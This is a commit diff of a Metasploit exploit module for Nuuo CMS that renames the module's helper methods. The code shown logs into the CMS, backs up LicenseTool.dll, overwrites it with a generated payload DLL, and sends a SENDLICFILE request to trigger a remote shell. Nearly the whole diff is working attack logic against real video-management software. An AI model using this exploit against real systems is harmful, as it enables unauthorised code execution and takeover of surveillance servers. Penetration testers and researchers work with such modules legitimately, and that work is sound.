Update nuuo_cms_fu.rb
parent
0685ebed76
commit
4e1d79ac4b
|
@ -73,9 +73,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
login
|
||||
nucs_login
|
||||
|
||||
if @session == nil
|
||||
if @nucs_session == nil
|
||||
fail_with(Failure::NoAccess, "Failed to login to Nuuo CMS")
|
||||
end
|
||||
|
||||
|
@ -83,18 +83,18 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
# and not nuke the CMS installation.
|
||||
@dll = rand_text_alpha(12)
|
||||
print_status("Backing up LicenseTool.dll to #{@dll}")
|
||||
dll_data = download_file("LicenseTool.dll")
|
||||
upload_file(@dll, dll_data)
|
||||
dll_data = nucs_download_file("LicenseTool.dll")
|
||||
nucs_upload_file(@dll, dll_data)
|
||||
|
||||
print_status("Uploading payload...")
|
||||
upload_file("LicenseTool.dll", generate_payload_dll)
|
||||
nucs_upload_file("LicenseTool.dll", generate_payload_dll)
|
||||
|
||||
print_status("Sleeping 15 seconds...")
|
||||
sleep 15
|
||||
|
||||
print_status("Sending SENDLICFILE request, shell incoming!")
|
||||
license_data = rand_text_alpha(50..350)
|
||||
send_data_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic",
|
||||
nucs_send_data_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic",
|
||||
"Content-Length: " + license_data.length.to_s], license_data)
|
||||
end
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue